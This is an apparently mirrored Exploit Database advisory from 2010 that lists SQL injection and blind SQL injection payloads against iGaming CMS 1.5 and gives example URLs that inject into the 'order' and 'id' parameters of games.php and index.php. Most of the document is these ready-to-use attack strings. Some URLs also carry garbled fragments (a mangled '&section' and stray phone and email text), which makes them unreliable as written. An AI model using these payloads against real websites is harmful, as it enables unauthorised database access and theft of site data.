iGaming CMS – Multiple SQL Injections

• Exploit Database
• 10 阅读

• 作者： Sweet
  日期： 2010-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14820/

• ############################################################################
  ##
  # Exploit Title: iGamingCMS1.5 multiple vulnirabilities#
  ##
  # Date: 27/08/2010 #
  ##
  # Author: Sweet#
  ##
  # Contact : charif38@hotmail.fr#
  ##
  # Software Link: http://www.igamingcms.com/#
  ## 
  # Download: http://forums.igamingcms.com/forumdisplay.php?f=5#
  ## 
  # Version:1.5#
  ##
  # Tested on: WinXp sp3 #
  ##
  # Risk : hight #
  ##
  ##
  # Description : iGaming CMS is a content management#
  # system designed for gaming websites. # 
  ##
  ##
  ##
  ############################################################################
  
  1-SQL injection:
  
  http://www.example.com/igamingpath/games.php?order=1[SQLi]§ion=111-222-1933email@address.tst&sort=desc
  
  2-Blind injection:
  
  http://www.example.com/igamingpath/games.php?order=title§ion=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc
  
  http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0
  
  
  thx to Milw0rm.com , JF - Hamst0r - Keystroke, inj3ct0r.com , exploit-db.com
  
  Saha Ftourkoum et 1,2,3 viva L'Algerie :))